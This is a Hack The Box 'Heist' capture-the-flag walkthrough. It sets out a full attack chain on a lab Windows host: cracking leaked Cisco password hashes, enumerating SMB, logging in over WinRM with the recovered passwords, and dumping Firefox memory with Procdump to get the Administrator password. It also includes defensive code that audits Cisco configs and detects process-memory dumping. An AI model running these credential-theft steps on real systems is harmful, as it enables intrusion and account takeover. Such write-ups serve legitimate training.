Hack The Box - Heist - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Heist machine hosted at https://hackthebox.eu.  For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Heist machine as the victim system.  After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.118.120.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

nmap -T4 -p- 10.129.118.120


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

nmap -sV -T4 -p80,135,445,5985,49669 10.129.118.120


This looks mostly typical for a Windows system, but we notice that port 5985 is open, which is associated with WinRM, so we'll keep that in mind as we continue with our enumeration.  For now, we'll take a look at the webpage:

http://10.129.118.120


We don't have credentials for the page, so we might as well try logging in as a guest user:

http://10.129.118.120/login.php?guest=true


We're redirected to a tech support conversation.  There are a few different things to note here.  First, we're dealing with Cisco software / equipment on this system.  Second, there's a username Hazard on the server.  Third, there's an attachment file to look at:

http://10.129.118.120/attachments/config.txt


We have a few different password hashes and usernames here.  The first hash appears to be in MD5crypt format, because the string starts with $1$.  After a bit of research, we found this webpage, which explains how Cisco router passwords are hashed:

https://learningnetwork.cisco.com/s/article/cisco-routers-password-types

Using that information, we deduce that the other two password hashes are Cisco type 7 passwords, which means they are encoded with a Vigenère-style cipher that is trivially reversible, and there are a few different websites we can use to decode Cisco type 7 password strings.  We use the following URL to do so:

https://packetlife.net/toolbox/type7/
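The hash types above are worth recognising on sight when auditing your own device configurations, so here is an added example (my own illustration, not code from the walkthrough or from Cisco) that parses IOS-style enable, username and line credential entries, classifies each by its type number and reports which ones an attacker could recover from a leaked config file.  The configuration lines and hash bodies are constructed placeholders, not the config.txt from the box; the type classification follows the Cisco article linked above.

```python
import re
from dataclasses import dataclass

# Constructed IOS-style configuration snippet for demonstration only: it is NOT
# the config.txt from the box, and the hash bodies are placeholders, not real
# digests.
SAMPLE_CONFIG = """\
version 15.2
service password-encryption
hostname router-lab
enable secret 5 $1$exmp$PLACEHOLDERmd5cryptBody00
username netops password 7 0242114B0E143F015F5D1E161713
username backup secret 9 $9$PLACEHOLDERscryptBodyXXXXXXXXXXXXXXX
username legacy password 0 plaintext-example
line vty 0 4
 password 7 02375012182C1A1D751618034F36415408
"""

# Cisco password type number -> (algorithm, verdict). Types 0 and 7 are fully
# recoverable from the config alone; type 5 (MD5crypt) is salted but cheap to
# brute-force offline, as the John run in the walkthrough shows; 8 and 9 are
# the current recommendation.
TYPE_INFO = {
    "0": ("plaintext", "CRITICAL"),
    "7": ("reversible Vigenere-style encoding with a fixed key", "CRITICAL"),
    "4": ("unsalted SHA-256, deprecated", "HIGH"),
    "5": ("MD5crypt (salted MD5, fast to brute-force)", "HIGH"),
    "8": ("PBKDF2-SHA256", "OK"),
    "9": ("scrypt", "OK"),
}

# 'password 7 <value>', 'secret 5 <value>', or 'password <value>' (no type
# digit means the value is stored in clear, i.e. type 0).
_CRED_RE = re.compile(r"\b(password|secret)\s+(?:([0-9])\s+)?(\S+)\s*$")
_USER_RE = re.compile(r"^\s*username\s+(\S+)")


@dataclass
class Finding:
    line_no: int
    context: str    # 'enable', 'username <name>' or 'line' (vty/console)
    keyword: str    # 'password' or 'secret'
    ptype: str
    algorithm: str
    verdict: str


def parse_config(text: str) -> list[Finding]:
    """Pull every credential line out of the config and classify its type."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        m = _CRED_RE.search(line)
        if not m:
            continue
        keyword, ptype, value = m.group(1), m.group(2), m.group(3)
        if ptype is None:
            ptype = "0"
        elif ptype == "5" and not value.startswith("$1$"):
            ptype = "?"  # type digit and hash prefix disagree: needs a human look
        algorithm, verdict = TYPE_INFO.get(ptype, ("unknown format", "REVIEW"))
        user = _USER_RE.match(line)
        if user:
            context = "username " + user.group(1)
        elif line.lstrip().startswith("enable"):
            context = "enable"
        else:
            context = "line"
        findings.append(Finding(no, context, keyword, ptype, algorithm, verdict))
    return findings


def weak_credentials(text: str) -> list[Finding]:
    """Entries an attacker could recover from a leaked copy of the config."""
    return [f for f in parse_config(text) if f.verdict in ("CRITICAL", "HIGH")]


def audit(text: str) -> list[str]:
    """Human-readable report: one line per finding, plus a note on the
    'service password-encryption' trap (it only produces type 7)."""
    notes = []
    if "service password-encryption" in text:
        notes.append("service password-encryption is on: it only yields type 7 "
                     "and does not protect a leaked config")
    for f in parse_config(text):
        notes.append(f"line {f.line_no}: {f.context} {f.keyword} type {f.ptype} "
                     f"({f.algorithm}) -> {f.verdict}")
    return notes


if __name__ == "__main__":
    for note in audit(SAMPLE_CONFIG):
        print(note)
```

The practical takeaway for anyone who manages this kind of equipment: a config backup is only as secret as its weakest entry, so every line the audit marks CRITICAL or HIGH should be replaced with a type 8 or type 9 secret, and the backup file itself should never sit on a web server as it did here.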



Now the only password we have left to crack is the MD5crypt one.  We copy the hash to a file, then use John the Ripper to crack it with rockyou.txt as the wordlist:

john --wordlist=rockyou.txt --format=md5crypt heistMD5.txt


Now that we have cracked a few potential passwords and collected a few usernames, we can attempt to authenticate to SMB using one of these combinations.  We find that the credential pair hazard / stealth1agent is valid for SMB, as illustrated here:

smbclient -L \\\\10.129.118.120\\ -U hazard


We successfully enumerate the SMB share names using the hazard / stealth1agent credentials, but are unable to go any further with them.  Now that we've identified valid SMB credentials, we can enumerate the SMB service further using enum4linux:

enum4linux -a -u hazard -p stealth1agent 10.129.118.120 | grep -i user


We pick up a few more usernames for the system, so we can attempt to match one of these names with the remaining cracked passwords we have.  It turns out that the chase user matches the Cisco router admin password Q4)sJu\Y8qz*A3?d.  That implies that chase is an admin user on the Windows system, and we also recall that WinRM is available on the server, so we attempt to log in using the chase credentials:

evil-winrm -i 10.129.118.120 -u chase -p 'Q4)sJu\Y8qz*A3?d'


Capturing the User Flag

Hack the Box Windows systems usually store the user flag in a user's \Desktop directory:

get-content c:\users\chase\desktop\user.txt


Foothold Enumeration

While enumerating the system, we find an unusual process running:

get-process


Privilege Escalation

If we were to use Procdump on the Firefox process, we may be able to capture credential information for any webpage sessions that are active in Firefox.  To do this, we'll need to do the following:


1) Upload Procdump.exe to the Windows system.

2) Execute Procdump on the Firefox process and save the output to a file.

3) Download the dump file to our attacking machine.

4) Enumerate the dump file for credential information.


First, we download the Procdump zip file from the Microsoft website, then unzip it:

wget https://download.sysinternals.com/files/Procdump.zip
unzip Procdump.zip



Then, from our Evil-WinRM shell, we upload the procdump64.exe file:

upload procdump64.exe


Second, we run Procdump against the Firefox process with the highest CPU usage (PID 6600):

.\procdump64.exe -accepteula -ma 6600


Third, we download the dump file to our attacking system using Evil-WinRM.  This takes quite a bit of time, because the dump file is around 500 MB:

download c:\users\chase\documents\firefox.exe_210325_033219.dmp


Finally, from our attacking machine, we run strings on the dump file and grep for usernames:

strings firefox.exe_210325_033219.dmp | grep -i username
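From the defender's side, every step of the dump procedure above leaves a trace that endpoint telemetry can catch.  The following is an added example (mine, not code from the walkthrough or from Sysinternals) of detection logic run over a handful of constructed Sysmon-style events: it flags a known dump tool being launched, a read-access handle opened to a browser or LSASS process, and a .dmp file written by anything other than Windows Error Reporting.  The event field names follow Sysmon's schema for event IDs 1, 10 and 11; the reader allow-list, the sensitive-process list, the LAB domain and the sample events themselves are assumptions made for the demo.

```python
import json
from dataclasses import dataclass
from ntpath import basename

# Constructed Sysmon-style events as JSON lines (EventID 1 = process create,
# 10 = process access, 11 = file create). These are NOT logs from the box;
# paths, domain and PIDs are made up, and the dump file name is the one shown
# in the walkthrough. Three benign events are mixed in to show the rules do
# not fire on ordinary activity.
SAMPLE_EVENTS_JSONL = r"""
{"EventID": 1, "Image": "C:\\Users\\chase\\Documents\\procdump64.exe", "CommandLine": ".\\procdump64.exe -accepteula -ma 6600", "User": "LAB\\chase"}
{"EventID": 10, "SourceImage": "C:\\Users\\chase\\Documents\\procdump64.exe", "TargetImage": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 11, "Image": "C:\\Users\\chase\\Documents\\procdump64.exe", "TargetFilename": "C:\\Users\\chase\\Documents\\firefox.exe_210325_033219.dmp"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt", "User": "LAB\\chase"}
{"EventID": 11, "Image": "C:\\Windows\\System32\\WerFault.exe", "TargetFilename": "C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp\\WER1234.tmp.dmp"}
"""

PROCESS_VM_READ = 0x0010   # access right required to read another process's memory

# Processes whose memory commonly holds live credentials or session tokens.
SENSITIVE_TARGETS = {"lsass.exe", "firefox.exe", "chrome.exe", "msedge.exe"}
# Legitimate memory readers that would otherwise flood the access rule
# (site-specific assumption: tune this per host).
ALLOWED_READERS = {"msmpeng.exe", "csrss.exe"}
KNOWN_DUMP_TOOLS = {"procdump.exe", "procdump64.exe"}


@dataclass
class Alert:
    rule: str
    event_id: int
    detail: str


def load_events(jsonl: str) -> list[dict]:
    """Parse one JSON object per non-empty line."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def detect(events: list[dict]) -> list[Alert]:
    """Apply the three dump-related rules to a list of Sysmon-style events."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 1:
            img = basename(ev.get("Image", "")).lower()
            cmd = ev.get("CommandLine", "")
            # Rule 1: a known dump tool launched, or anything called with the
            # Procdump full-dump switch.
            if img in KNOWN_DUMP_TOOLS or (" -ma " in f" {cmd} " and "procdump" in cmd.lower()):
                alerts.append(Alert("dump-tool-launch", 1, f"{ev.get('User')} ran {cmd}"))
        elif eid == 10:
            src = basename(ev.get("SourceImage", "")).lower()
            tgt = basename(ev.get("TargetImage", "")).lower()
            access = int(str(ev.get("GrantedAccess", "0")), 16)
            # Rule 2: a handle with VM_READ to a credential-bearing process from
            # a non-allow-listed reader. Query-only access (0x1000) is ignored.
            if tgt in SENSITIVE_TARGETS and access & PROCESS_VM_READ and src not in ALLOWED_READERS:
                alerts.append(Alert("sensitive-process-memory-read", 10,
                                    f"{src} -> {tgt} access={access:#x}"))
        elif eid == 11:
            img = basename(ev.get("Image", "")).lower()
            path = ev.get("TargetFilename", "")
            # Rule 3: a minidump written by anything other than Windows Error
            # Reporting, which is the normal producer of .dmp files.
            if path.lower().endswith(".dmp") and img != "werfault.exe":
                alerts.append(Alert("minidump-written", 11, f"{img} wrote {path}"))
    return alerts


if __name__ == "__main__":
    for a in detect(load_events(SAMPLE_EVENTS_JSONL)):
        print(f"[{a.rule}] event {a.event_id}: {a.detail}")
```

On a real estate the allow-list needs tuning per host, since EDR agents and backup tools legitimately read process memory, and the same access-mask check on event 10 is the standard way to catch LSASS dumping.  The root cause this box demonstrates, a privileged password sitting in a browser session and reused for the local Administrator account, is best addressed by not reusing administrative credentials in web applications at all.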


We deduce that this password will work for the system's Administrator account, since the hazard user mentioned taking over this system from a previous administrator.  We attempt to log in as the Administrator user via Evil-WinRM:

evil-winrm -i 10.129.119.29 -u Administrator -p '4dD!5}x/re8]FBuZ'


Capturing the Root Flag

Hack the Box Windows systems typically store the root flag in the Administrator user's \Desktop directory:

get-content C:\users\administrator\desktop\root.txt


Summary

After initial scans, we found that a page on the web server exposed password hashes, which we were able to crack and use to enumerate the target's SMB service, which in turn led to the capture of valid WinRM credentials.  Using those credentials, we gained a foothold on the target and found a Firefox process running on the system.  Using Procdump, we extracted administrator credentials from that process and logged in to the WinRM service as the Administrator account, allowing us to capture our objective flag file.

Finish
